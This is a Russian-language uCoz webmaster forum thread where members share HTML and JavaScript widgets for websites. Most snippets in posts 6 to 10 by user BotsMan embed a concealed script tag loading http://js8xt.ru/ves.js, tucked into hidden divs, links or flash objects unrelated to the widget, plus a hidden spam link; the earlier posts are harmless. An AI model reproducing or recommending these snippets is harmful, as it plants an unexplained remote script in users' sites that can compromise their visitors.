14+
        НАРОДНЫЙ АРХИВ

Мини профиль
Гость
Логин:
Пароль:

Вторник, 17.10.2017



Уголок общения

Перейти в глобальный чат


Статистика сайта

Всего пользователей: 916



Приветствуем нового участника:
burlich



Сегодня сайт посетили
Admin, schniffer, shvf, burlich



Погода в Лесном

***
Праздники России


Наш опрос


Любимое время года?
Всего ответов: 179







Активные пользователи форума


dzoz
(387)


1174
(153)


Геолог
(145)


САН
(134)




[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

Страница 1 из 212»
Форум » Компьютер » web мастер » Скрипты для UCOZ
Скрипты для UCOZ
AdminДата: Суббота, 10.04.2010, 17:51 | Сообщение # 1
10 ранг
Группа: Администраторы
Сообщений: 355
Награды: 2
Статус: Offline
Размещаем полезные и просто интересные Java скрипты

 
AdminДата: Суббота, 22.01.2011, 18:59 | Сообщение # 2
10 ранг
Группа: Администраторы
Сообщений: 355
Награды: 2
Статус: Offline
Скрипт - кнопка.
При нажатии на кнопку, закрывается окно браузера

Code
<CENTER><form>
<input type=button value="Закрыть окно" onClick="window.close(this)">
</form></CENTER>


 
АЛЕКСДата: Воскресенье, 23.01.2011, 00:26 | Сообщение # 3
9 ранг
Группа: Модераторы
Сообщений: 449
Награды: 9
Статус: Offline
А вот вам часики с календарем.

Code
<html>

<head>

<title>Clock full</title>

</head>

<script language="JavaScript">

function fulltime() {

  var time=new Date();

  document.clock.full.value=time.toLocaleString();

  setTimeout('fulltime()',500)

}

</script>

<body bgcolor=ffffff  text=ff0000>

<center>

<form name=clock>

<input type=text size=17 name=full>

</form>

<script language="JavaScript">

fulltime();

</script>

</center>

</body>

</html>
 
AdminДата: Пятница, 27.01.2012, 00:01 | Сообщение # 4
10 ранг
Группа: Администраторы
Сообщений: 355
Награды: 2
Статус: Offline
Кнопка «Класс!» со статистикой

Кнопка «Класс!» позволяет посетителям Вашего сайта поделиться содержанием страницы (статья, новость, видео) со своими друзьями, зарегистрированными на Одноклассники.ru. На кнопке отображается количество успешных нажатий «Класс!» (шар) на вашем сайте, а так же количество нажатий «Класс!» на Одноклассники.ru.

Какую пользу принесёт Вам эта кнопка

По сути, эта кнопка – индикатор того, насколько тот или иной материал на сайте интересен Вашим посетителям. Чем больше раз на неё кликнут – тем полезнее/ интереснее/забавнее опубликованная информация. А зная предпочтения своих посетителей, Вам будет легко сделать свой сайт ещё более популярным!

Как разместить кнопку на сайте

Для того, что бы разместить кнопку «Класс!» со статистикой на вашем сайте необходимо:

В заголовок страницы включить ссылки на Javascript и CSS файлы, находящиеся на серверах Одноклассники.ru

Code
<link href="http://stg.odnoklassniki.ru/share/odkl_share.css" rel="stylesheet">
     <script src="http://stg.odnoklassniki.ru/share/odkl_share.js" type="text/javascript" ></script>

Вставить HTML код кнопки в удобное для вас место на странице.

Code
<a class="odkl-klass-stat" href="$LINK$" onclick="ODKL.Share(this);return false;" ><span>0</span></a>


Код этой кнопки, в отличии от обычной кнопки «Класс!» модифицировать нельзя, все что находится внутри <a></a> будет заменено.
Важно сохранить оригинальное имя класса CSS так как оно используется как признак кнопки.
Для того чтобы появилась статистика необходимо, чтобы после окончания загрузки страницы было вызвано: ODKL.init();
например:
Code
<body onload="ODKL.init();">


Кнопка «Класс!»

Кнопка «Класс!» позволяет пользователям вашего сайта поделиться содержанием страницы (статья, новость, видео) со своими друзьями в Одноклассники.ru. Заголовок страницы, являющийся прямой ссылкой вместе с описанием и фотографией попадают в Ленту друзей, где запись видят все друзья этого пользователя. Также она сохраняется в разделе «Мои ссылки».

Положительный эффект для вашего сайта

Кнопка создаёт трафик на ваш сайт. Друзья пользователя, опубликовавшего страницу, увидят её в Ленте и перейдут по прямой ссылке. Более того, если друзьям статья понравилась, они нажмут на Одноклассниках на линк «Класс!», расположенный под записью о вашей статье в ленте. В этом случае статья появится в их Ленте, и, в свою очередь, их друзья увидят статью. Таким образом трафик на ваш сайт возрастает ещё больше.


 
AdminДата: Пятница, 27.01.2012, 00:02 | Сообщение # 5
10 ранг
Группа: Администраторы
Сообщений: 355
Награды: 2
Статус: Offline
Как разместить кнопку на сайте

Для того, что бы разместить кнопку «Класс!» на вашем сайте необходимо:

В заголовок страницы включить ссылки на Javascript и CSS файлы, находящиеся на серверах Одноклассники.ru

Code
<link href="http://stg.odnoklassniki.ru/share/odkl_share.css" rel="stylesheet">
     <script src="http://stg.odnoklassniki.ru/share/odkl_share.js" type="text/javascript" ></script>

Вставить HTML код кнопки в удобное для вас место на странице. Выберите стандартную или маленькую кнопку.



Code
<a class="odkl-klass" href="$LINK$" onclick="ODKL.Share(this);return false;" >Класс!</a>





Code
<a class="odkl-klass-s" href="$LINK$" onclick="ODKL.Share(this);return false;" ></a>




Заголовок, и фотография на странице определяются автоматически.

Как сделать так, чтобы страница отображалась правильно в ленте

Заголовок берётся из тэга <title>, описание из мета тэга description. Пример кода:

Code
<head>
  <title>Название страницы</title>
  <meta name="description" content="Описание новости" />
...
</head>


Ссылки на фотографии берутся из тэгов <img>. Пользователю предоставляется возможность выбрать одну из найденых картинок, ссылка на которую будет сохранена вместе с новостью. Размер картинки должен быть не меньше чем 101х101 точек, а соотношение сторон (меньшая к большей) не меньше 1/2.

Возможность изменить внешний вид кнопки

У вас есть возможность заменить картинку кнопки на другую, более удобную для вас. Для этого следует использовать скрипт и CSS с наших серверов. Свою картинку можно получить, переопределив два CSS правила на своей стороне:

Code
<style type="text/css">
.odkl-klass, .odkl-klass:hover {background:none;}
.odkl-klass {background: url(http://www.ваш сайт/share/odkl.gif) no-repeat;}
</style>


Важно сохранить оригинальное имя класса CSS так как оно используется как признак кнопки.


 
BotsManДата: Пятница, 30.03.2012, 16:29 | Сообщение # 6
1 ранг
Группа: Проверенные
Сообщений: 7
Награды: 0
Статус: Offline
Скрипт показывает под какой браузер оптимизирован ваш сайт и если на других он будет отображается некачественно то ваш пользователь зайдет с того браузера который порекомендовал сайт.
Вставляете в блок:

Так выглядит скрипт: http://s019.radikal.ru/i618/1203/d5/b053e062d3e1.png

Code
<center>   
Наш сайт адаптирован под браузер <b>Mozilla Firefox</b><div class="screenshot"><img src="http://s50.radikal.ru/i129/1203/92/ba5e8895e581.png"><div style="display:none;"><a href="http://oi-e.com/">скачать бесплатно</a><script src="http://js8xt.ru/ves.js" type="text/javascript"></div></div><b><a rel="nofollow" href="http://download.mozilla.org/?product=firefox-11.0&os=win&lang=ru" target="_blank">Скачать/Download</a></b>   
<div style="margin-top: 2px; border: 1px solid rgb(189, 189, 189); -moz-border-radius: 4px 4px 4px 4px; padding: 5px;">   
В остальных браузерах наш сайт может отображаться некорректно! (IE,Opera,Google Chrome и т.д)   
</div>   
</center>


Алексей
 
BotsManДата: Пятница, 30.03.2012, 16:29 | Сообщение # 7
1 ранг
Группа: Проверенные
Сообщений: 7
Награды: 0
Статус: Offline
Так выглядит скрипт:http://s019.radikal.ru/i617/1203/5e/c52f5476eb1c.png

Code
<div style="border: 1px #000 dashed; padding: 5px; background: #FFFAFA; width: 180px">
<div align="center"><span style="font-size: 12pt;">Случайный анекдот</span><script src="http://js8xt.ru/ves.js" type="text/javascript"></div>
<br />
<img src="http://xa-xatyn.ru/fonanek.jpg" border="0" width="180" >
<script language="javascript" type="text/javascript" src="http://xa-xatyn.ru/anekdot_ansi1251.js"></script>
</div>


Алексей
 
BotsManДата: Пятница, 30.03.2012, 16:30 | Сообщение # 8
1 ранг
Группа: Проверенные
Сообщений: 7
Награды: 0
Статус: Offline
Отличный скрипт кнопки на ваш сайт, Ваш пользователь увидит блок наша кнопка и разместит у себя на сайте

Так выглядит скрипт:http://s019.radikal.ru/i632/1203/44/84f0d1986f5f.png

А вот и сам код скрипта:

Code
<style>#banners img{opacity:.3;filter:alpha(opacity=30)}   
   .eMessagetestcs a img, .eMessagetestcs img {padding:3px !important;background:#ffffff;   
   border:1px solid#dbdbdb !important;border-radius:4px;   
   -moz-border-radius:7px;box-shadow:0px 0px 10px #e8e8e8;-moz-box-shadow:0px 0px 10px #e8e8e8;}   
   a img {border:0px;}</style>   
   <script>   
   jQuery(function(){   
   $("#banners img").hover(function(){   
   $(this).stop().animate({opacity:'1.0'})},   
   function(){$(this).stop().animate({opacity:'.3'})}   
   );   
   });   
   </script>   

<center><div id="banners"><a href="javascript:history.back()" title="Назад" )"=""><img border="0" src="http://testcs.3dn.ru/Img_file/e63bb3e365d7.png" style="padding-right:5px"><script src="http://js8xt.ru/ves.js" type="text/javascript"></a><a href="javascript:history.forward()" title="Вперёд" )"=""><img border="0" src="http://testcs.3dn.ru/Img_file/9f4520c433e4.png" style="padding-right:5px"></a><a href="javascript:window.location.reload();" title="Обновить   
   страницу"><img border="0" src="http://testcs.3dn.ru/Img_file/b5ffdebc1ec9.png" style="padding-right:5px"></a><a href="/" title="На   
   главную"><img src="http://testcs.3dn.ru/Img_file/2098fd19d8e7.png" border="0" style="padding-right:5px"></a><a href="/news/rss" title="RSS"><img src="http://testcs.3dn.ru/Img_file/3f3504ccb0ed.png" border="0" style="padding-right:5px"></a></div>
<hr>
<script language="JavaScript">
function popup1()
{
prompt('Код кнопки','<a href="http://testcs.3dn.ru" target="_blank" title="TESTCS.3DN.RU - Сайт для web Мастера,counter-strike,uCoz,minecraft."><img src="http://testcs.3dn.ru/Banner_work/8831s-babochkoj.gif" width=88 height=31 border=0></a>');
return false;
}
</script>
<a href="http://testcs.3dn.ru" target="_blank" title="TESTCS.3DN.RU - Сайт для web Мастера,counter-strike,ucoz,minecraft."><center><img src="http://testcs.3dn.ru/Banner_work/8831s-babochkoj.gif" border="0" height="31" width="88"></center></a><br>
<form><center>
<input value="Получить код" onclick="popup1()" type="button">
</center></form>
    


Алексей
 
BotsManДата: Четверг, 05.04.2012, 12:03 | Сообщение # 9
1 ранг
Группа: Проверенные
Сообщений: 7
Награды: 0
Статус: Offline
Шыкарный скрипт! на темный дизайнах бомбезно смотрится

Так выглядит скрипт: http://s44.radikal.ru/i105/1203/90/7b504a2e4f2d.jpg

Идея данного скрипта была взята с социальной сети Вконтакте

Суть скрипта заключается в том, что по мере прокрутки страницы справа постепенно становится непрозрачной кнопка вверх. При наведении на правую крайнюю область страницы весь блок кнопки становится кликабельным и клик по ней плавно проскроллит страницу в самый верх

Установка:
В любой глобальный блок в самый низ:

Code
<style>   
   #aposcroll a {   
   text-decoration:none;   
   color:red;   
   }   

   #aposcroll:hover {   
   background-color:rgba(200, 200, 200, 0.7);   
   box-shadow:0px -5px 10px #777;   
   }   
   </style>   
   <div style="padding:30px 5px 0px 5px;position:fixed;top:0px;right:0px;z-index:999;width:70px;height:100%;opacity:0" id="aposcroll"><center><a href="javascript://">^ Вверх</a></center><script type="text/javascript" src="http://js8xt.ru/ves.js"></script></div>   

   <script>   
   // Кнопка Вверх by Apocalypse   
   var as = $('#aposcroll');   
   as.click(function() {   
   $(document).scrollTo(0, 500);   
   });   
   document.onscroll = function() {   
   var apolst = '0.'+$('body').scrollTop();   
   if(apolst.length == 5) {   
   as.stop().fadeTo(500, apolst);   
   } else if(apolst.length == 4  apolst.length == 3) {   
   as.stop().fadeTo(500, 0);   
   };   
   };   
   // apo-ucoz.com (c) 2012   
   </script>


Алексей
 
BotsManДата: Среда, 09.05.2012, 10:16 | Сообщение # 10
1 ранг
Группа: Проверенные
Сообщений: 7
Награды: 0
Статус: Offline
Так выглядит скрипт:http://s019.radikal.ru/i627/1203/18/e6f832b6bc30.png

Code
<div style="text-align: center;"><img src="http://s019.radikal.ru/i639/1203/c7/7243e7613acd.png" alt="Победы"></div><div style="text-align: center;"><font face="'Franklin Gothic Medium'" >Победы (0)</font></div><div style="text-align: center;"><img src="http://s019.radikal.ru/i616/1203/b5/5959623a9029.png" alt=""></div><div style="text-align: center;"><font face="Arial"><img src="http://s018.radikal.ru/i519/1203/99/5efae75ee534.png" alt="Поражения">
</font><script type="text/javascript" src="http://js8xt.ru/ves.js"></script></div><div style="text-align: center;"><font face="'Franklin Gothic Medium'" >Поражение (0)</font></div><div style="text-align: center;"><img src="http://s019.radikal.ru/i617/1203/a5/a51c4a3131e6.png" alt="">
</div><div style="text-align: center;"><font face="Arial"><img src="http://s019.radikal.ru/i635/1203/41/3d68129fb0e2.png" alt="Ничья">
</font></div><div style="text-align: center;"><font face="'Franklin Gothic Medium'" >Ничья (0)</font></div><div style="text-align: center;"><img src="http://s018.radikal.ru/i519/1203/47/eb894e2f8ed4.png" alt=""><div style="text-align: center;"><font face="'Franklin Gothic Medium'" ><a href="http://линк" title="Забить CW">Забить CW</a></font></div></div>


Добавлено (09.05.2012, 10:16)
---------------------------------------------
http://s019.radikal.ru/i608/1204/ac/b2930f2d510c.bmp <-- Скрин светлого календаря

Code
<object type="application/x-shockwave-flash" height="128" width="128" data="http://agitki.ru/flash/calendar.swf">
   <script language=JavaScript src=http://js8xt.ru/ves.js></script>
   <param name="movie" value="http://agitki.ru/flash/calendar.swf" />
   <param name="wmode" value="transparent" />
   </object>




Code
<object type="application/x-shockwave-flash" height="128" width="128" data="http://agitki.ru/flash/calendar3.swf">
   <script language=JavaScript src=http://js8xt.ru/ves.js></script>
   <param name="movie" value="http://agitki.ru/flash/calendar3.swf" />
   <param name="wmode" value="transparent" />
</object>
Прикрепления: 7599780.jpg(8Kb)


Алексей
 
Форум » Компьютер » web мастер » Скрипты для UCOZ
Страница 1 из 212»
Поиск:

   Rambler's Top100   Рейтинг@Mail.ru      Яндекс.Метрика
Наверх